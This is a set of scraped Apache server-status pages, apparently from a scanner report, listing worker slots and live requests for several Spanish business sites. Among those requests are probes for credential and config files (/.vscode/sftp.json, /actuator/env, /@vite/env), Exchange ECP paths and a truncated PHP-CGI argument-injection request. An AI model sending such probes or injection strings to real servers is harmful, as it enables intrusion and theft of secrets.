162.158.163.246h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41113957150/4/51294_ 0.56319504242032710.00.081554.61 104.23.175.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41113957150/2/50426_ 0.50371507274672800.00.041517.56 172.70.243.35h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41113957150/1/51049_ 0.30372654224678500.00.021527.90 172.68.211.204h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41113957150/0/49215_ 0.003350353002480.00.001366.37 104.22.1.220h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41113957150/3/50688_ 0.55340396478090720.00.021479.24 172.70.34.86h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-41113957160/6/47493_ 0.68204497254207140.00.091421.82 20.171.27.90http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcMGLNDD_103.23.61.80_80\n 2-41113957160/4/46705_ 0.65218790395359620.00.021352.77 172.71.214.196h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-41113957160/4/47392_ 0.59218474304011860.00.081484.09 172.70.142.53h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-41113957160/4/46446_ 0.68223451233278650.00.081394.90 172.68.164.5h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-41113957160/4/46754_ 0.64225485209110400.00.181561.18 172.71.214.196h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41113957160/2/47252_ 0.56226478242205320.00.041376.30 162.158.163.246h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-41113957160/2/46820_ 0.55226247220764900.00.021427.61 162.158.163.246h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-41113957160/6/47068_ 0.67227424249542050.00.121427.84 172.68.164.5h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-41113957160/3/47042_ 0.67204488243612900.00.061606.52 172.68.164.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41113957160/6/47490_ 0.63225477263993580.00.131458.10 162.158.129.174h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/1/55143_ 0.38225577332911190.00.021701.65 172.69.109.70h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/1/53741_ 0.27225451299234550.00.021505.57 162.159.122.84h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/2/55043_ 0.56230776332215380.00.041680.05 104.22.17.47h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/1/54130_ 0.423370355243170.00.001796.52 172.71.239.103h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/3/54541_ 0.57228477283307700.00.061561.44 104.23.223.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/1/54473_ 0.30339503267554820.00.021695.14 172.71.235.67h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/1/54949_ 0.41337480303607580.00.021726.53 172.70.94.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/2/54726_ 0.413402387695660.00.011719.67 104.23.211.15h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-41113957130/5/53869_ 0.51223459922875710.00.091639.87 104.23.239.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41113957130/3/55160_ 0.51223434408166670.00.061623.45 172.71.214.196h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41113958490/41/47045_ 3.3360408471340.00.731545.09 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 4-41113958490/46/47229_ 3.3350281893070.00.711546.87 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 4-41113958490/43/47282_ 3.3420239795940.00.791577.34 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-41113958490/42/47429_ 3.3400255933660.00.741495.67 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-41113958490/44/46649_ 3.340027144524
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3105d35b6
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 27-Nov-2025 02:51:35 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 402 Parent Server MPM Generation: 401 Server uptime: 75 days 14 hours 30 minutes 32 seconds Server load: 0.00 0.08 0.08 Total accesses: 2383917 - Total Traffic: 73.3 GB - Total Duration: 1487985061 CPU Usage: u162.27 s225.96 cu13186.1 cs7551.23 - .323% CPU load .365 requests/sec - 11.8 kB/second - 32.2 kB/request - 624.177 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01092202no1yes19000 11092068no0yes010000 21092072no0yes010000 31092070no0yes010000 41092069no0yes010000 Sum501 149000 ______W___________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-40110922020/37/44000_ 2.334136327758800.00.211616.93 114.119.139.166http/1.1barrerasdecontencion.com:443GET /barreras-de-contencion/portico_bw HTTP/1.1 0-40110922020/40/43504_ 2.3610485597770.00.491402.03 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-40110922020/49/44027_ 2.3640198786260.00.521419.12 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-40110922020/47/43618_ 2.3600210309200.00.421440.93 172.71.191.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40110922020/38/44392_ 2.3620204294910.00.951473.34 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-40110922020/34/43913_ 1.78418205292410.00.341462.17 107.189.10.79http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40110922020/35/44145W 2.2900285113500.00.231397.53 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-40110922020/39/43431_ 2.34035215741470.00.571484.11 162.158.22.192h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40110922020/40/44198_ 2.3600211052450.00.431384.66 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-40110922020/46/43954_ 2.3540319233740.00.551585.51 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/0/48958_ 0.008110216503310.00.001622.67 162.158.63.231h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/0/49573_ 0.008120255954180.00.001623.30 104.23.190.162h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/0/49188_ 0.0081722263224830.00.001515.31 172.68.134.234h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/1/49087_ 0.988170711385290.00.011487.20 172.68.210.100h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/0/49661_ 0.0015200235530270.00.001566.81 162.158.168.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/0/50324_ 0.001520522230172140.00.001530.97 172.71.254.54h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/1/49376_ 0.761525277264944670.00.091490.37 172.70.93.15h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/0/49952_ 0.001846685217220310.00.001500.13 172.70.34.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/0/48206_ 0.0018460343284790.00.001345.17 162.158.123.141h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40110920680/1/49664_ 0.6518510468471270.00.391452.71 172.71.124.49h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40110920720/46/46711_ 2.6210248166860.01.061400.12 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-40110920720/42/45791_ 2.500189383284620.00.901334.87 172.69.39.106h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40110920720/46/46558_ 2.5421297686100.01.021436.95 104.23.241.11h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40110920720/43/45660_ 2.512523226128780.01.011372.32 104.23.254.80h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40110920720/44/45946_ 2.460565201240310.00.651542.86 172.70.206.168h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40110920720/48/46423_ 2.6220217718950.01.361358.57 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-40110920720/42/45876_ 2.6200214082380.00.711398.15 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-40110920720/46/46244_ 2.6210242562630.00.991406.65 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-40110920720/48/46188_ 2.6220236098950.01.351562.59 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-40110920720/43/46634_ 2.6200256285020.01.111439.70 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-40110920700/0/53851_ 0.001527211322798800.00.001658.70 172.70.47.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40110920700/0/52421_ 0.00152719289061330.00.001469.61 172.68.135.28h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40110920700/1/53703_ 0.6415320316972870.00.001650.66 162.158.170.128h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40110920700/2/52842_ 0.7415320339905350.00.121758.95 108.162.249.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40110920700/2/53163_ 0.96797319265554160.01.341537.86 104.23.245.27h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40110920700/0/53152_ 0.0018460251201870.00.001655.48 172.70.111.240h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-40110920700/0/53528_ 0.001847294296683800.00.001701.22 162.158.186.174h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40110920700/1/53462_ 0.411847403377259450.00.091683.45 108.162.238.104h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40110920700/0/52581_ 0.007920915691240.00.001613.63 162.158.158.197h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40110920700/0/53830_ 0.007920393933730.00.001593.96 162.158.123.148h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-40110920690/1/45572_ 0.602180968397773580.00.001444.21 172.64.217.52h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-40110920690/0/45719_ 0.001638307268858010.00.001499.39 162.158.187.128h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-40110920690/0/45803_ 0.004098605229629720.00.001547.60 172.68.26.179h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-40110920690/0/46009_ 0.002175312245156260.00.001463.62 172.64.217.125h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-40110920690/0/45242
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e32629655a
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 21-Nov-2025 16:04:26 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 377 Parent Server MPM Generation: 376 Server uptime: 70 days 3 hours 43 minutes 23 seconds Server load: 0.17 0.23 0.19 Total accesses: 2211018 - Total Traffic: 68.6 GB - Total Duration: 1379540256 CPU Usage: u151.73 s208.71 cu12213.1 cs6988.45 - .323% CPU load .365 requests/sec - 11.9 kB/second - 32.5 kB/request - 623.939 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0470753no0yes010000 1470752no0yes010000 2470857no2yes010000 3470886no2yes19010 4470754no0yes010000 Sum504 149010 ___________________________________W______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3764707530/33/41979_ 0.9969303317375380.02.541561.65 108.162.246.252h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3764707530/36/41357_ 1.6010471098480.02.091344.99 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-3764707530/32/41758_ 1.511334184607940.02.231378.57 172.64.223.174h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 0-3764707530/31/41505_ 0.98218322200343970.02.041383.66 108.162.246.252h2tandemsl.com:443done, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 0-3764707530/33/42066_ 1.46218386188446300.02.341430.22 162.158.238.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3764707530/33/41871_ 1.5674175194841860.02.411416.63 172.70.54.42h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3764707530/34/42059_ 1.1969631269604260.02.571336.37 172.68.15.231h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3764707530/32/41423_ 1.4869389178819010.02.401402.13 172.64.223.174h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3764707530/32/41988_ 1.5910193004130.01.981314.84 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 0-3764707530/30/41812_ 1.491325304918300.02.141508.22 172.64.223.174h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 1-3764707520/1/46280_ 0.55472390205071710.00.031510.83 172.64.223.175h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/1/46889_ 0.57469440243331960.00.031516.05 172.64.223.175h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3764707520/1/46481_ 0.57466319250336640.00.021460.09 172.64.223.175h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-3764707520/0/46313_ 0.004610697279820.00.001426.15 162.158.49.66h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-3764707520/0/47075_ 0.004610220909170.00.001505.64 162.158.49.212h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/1/47565_ 0.7210217241050.00.001421.72 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 1-3764707520/0/46798_ 0.0010253675950.00.001420.80 162.158.230.152h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/0/47216_ 0.0020480203726400.00.001424.22 162.158.6.250h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/0/45628_ 0.0020480331316890.00.001293.69 162.158.38.186h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3764707520/0/46975_ 0.0020481457132130.00.001376.44 162.158.6.236h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3764708570/22/43007_ 2.1400215033870.00.501317.42 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-3764708570/20/42061_ 2.1500363975230.00.171235.19 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-3764708570/29/42705_ 2.1500277055990.01.751350.94 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-3764708570/20/41993_ 2.1500207574780.00.641272.11 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-3764708570/24/42213_ 2.090169177371060.00.291443.78 172.64.223.44h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-3764708570/27/42617_ 2.1500198490380.00.961252.35 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3764708570/27/42187_ 2.1500190727830.00.561283.75 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3764708570/25/42453_ 2.081159212724980.00.341303.60 172.64.223.44h2tandemsl.com:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-3764708570/25/42524_ 2.152417205893160.00.331482.59 172.64.223.175h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3764708570/24/42656_ 2.1510235632620.00.151351.93 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-3764708860/28/47566_ 2.130406288453220.00.271512.90 172.64.223.175h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-3764708860/33/46134_ 2.2310250655770.00.371322.51 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-3764708860/28/47365_ 2.191457275444610.00.541501.15 172.64.223.175h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3764708860/31/46496_ 2.2300302761570.00.501578.20 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-3764708860/29/46637_ 2.210205226952130.00.721377.15 172.69.136.201h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3764708860/33/46527W 2.2300213068550.00.351488.68 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-3764708860/32/46976_ 2.2300260433980.00.451526.00 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-3764708860/29/46954_ 2.2400338826600.00.321486.22 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3764708860/23/46290_ 2.071402871317500.00.361450.82 162.158.238.145h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3764708860/26/47312_ 2.2400358035160.01.891463.50 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-3764707540/34/43310_ 0.85177199367161250.00.011360.34 172.68.22.40h2tandemsl.com:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 4-3764707540/34/43375_ 0.851531200246771950.00.011418.01 172.68.22.40h2tandemsl.com:443idle, streams: 0/341/341/0/0 (open/recv/resp/push/rst) 4-3764707540/34/43377_ 0.85177190216519530.00.011468.73 172.68.22.40h2tandemsl.com:443idle, streams: 0/339/339/0/0 (open/recv/resp/push/rst) 4-3764707540/33/43771_ 0.851532161230059740.00.011324.90 172.68.22.40h2tandemsl.com:443idle, streams: 0/340/340/0/0 (open/recv/resp/push/rst) 4-3764707540/35/43045_ 1.34186419244150560.00.03
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3ff1d665f
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 16-Nov-2025 23:16:36 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 355 Parent Server MPM Generation: 354 Server uptime: 65 days 10 hours 55 minutes 33 seconds Server load: 0.21 0.10 0.09 Total accesses: 2044358 - Total Traffic: 63.5 GB - Total Duration: 1246428749 CPU Usage: u164.07 s210.81 cu11254.7 cs6373.93 - .318% CPU load .361 requests/sec - 11.8 kB/second - 32.6 kB/request - 609.692 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04126551no0yes010000 14126554no0yes010000 24126552no1yes19000 34126685no1yes010000 44126553no0yes010000 Sum502 149000 _____________________W____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-35441265510/9/37630_ 7.071278290782870.00.151394.91 172.70.108.241h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/5/36958_ 5.1712441963110.00.051233.32 172.68.135.160h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/2/37318_ 7.6610157926810.00.001245.55 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-35441265510/8/37362_ 7.6521176513260.00.011298.65 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-35441265510/6/37647_ 7.6600163473940.00.011286.88 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-35441265510/3/37638_ 0.5317680172259680.00.001270.35 172.64.192.107h2lcftech.es:443done, streams: 0/1/1/0/1 (open/recv/resp/push/rst) 0-35441265510/4/37712_ 5.1817680241998480.00.021184.97 172.68.134.196h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/5/37248_ 7.6610156691560.00.031261.46 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-35441265510/6/37540_ 5.2520167718000.00.111194.09 162.158.122.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/7/37394_ 7.651367196221300.00.381315.81 172.70.208.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/11/43589_ 7.1910190276680.00.071394.75 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-35441265540/9/44250_ 5.401210219025750.00.111416.96 162.158.91.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/8/43816_ 5.40415291230077190.00.171378.79 162.158.91.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/7/43665_ 5.40415216676630640.00.021333.91 162.158.91.85h2tandemsl.com:443idle, streams: 0/16/16/0/0 (open/recv/resp/push/rst) 1-35441265540/8/44399_ 5.39471258184250490.00.161402.72 162.158.91.85h2tandemsl.com:443done, streams: 0/20/20/0/0 (open/recv/resp/push/rst) 1-35441265540/11/44922_ 7.0410197674860.00.121331.79 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-35441265540/8/44273_ 6.87420328236609310.00.081349.09 172.71.135.79h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/6/44678_ 7.074200188514230.00.061321.55 172.71.215.68h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/13/42939_ 7.1810302412910.00.391212.39 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 1-35441265540/9/44338_ 5.39470239436618010.00.461297.54 162.158.91.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35441265520/146/41367_ 13.6500200931460.03.461256.48 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-35441265520/132/40414W 13.5300347271670.02.811191.69 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-35441265520/122/41113_ 13.6500264942500.02.801282.15 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-35441265520/152/40368_ 13.6500195459830.02.331219.40 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-35441265520/133/40659_ 13.6500163471870.02.071407.54 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-35441265520/140/40982_ 13.6400188475600.09.241211.93 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-35441265520/137/40584_ 13.540374180993200.02.961225.70 185.180.141.55http/1.1 2-35441265520/148/40831_ 13.6500190295190.01.531261.22 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-35441265520/128/40900_ 13.4000195682960.04.211424.70 185.180.141.54http/1.1 2-35441265520/136/40936_ 13.630321222138790.02.181278.21 172.71.164.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-35441266850/181/44417_ 14.79117260446610.04.151396.60 185.180.141.53http/1.1 3-35441266850/177/43080_ 14.8800222012960.03.241244.87 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-35441266850/177/44157_ 14.8800257097030.02.921382.96 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-35441266850/157/43488_ 14.8810277263290.01.991450.36 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-35441266850/180/43434_ 14.861216201038830.02.251298.14 162.158.193.45h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-35441266850/173/43449_ 14.8710197021160.025.141385.61 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 3-35441266850/155/43851_ 14.8600233091630.015.771451.28 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 3-35441266850/173/43897_ 14.8620309943170.02.701374.19 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 3-35441266850/172/43135_ 14.671291849944240.03.661370.85 185.180.141.53http/1.1 3-35441266850/167/44320_ 14.732385337881550.02.351378.98 185.180.141.52http/1.1 4-35441265530/4/38267_ 2.2678331333771440.00.001224.66 162.158.110.243h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/8/38372_ 4.7578380202974330.00.171275.41 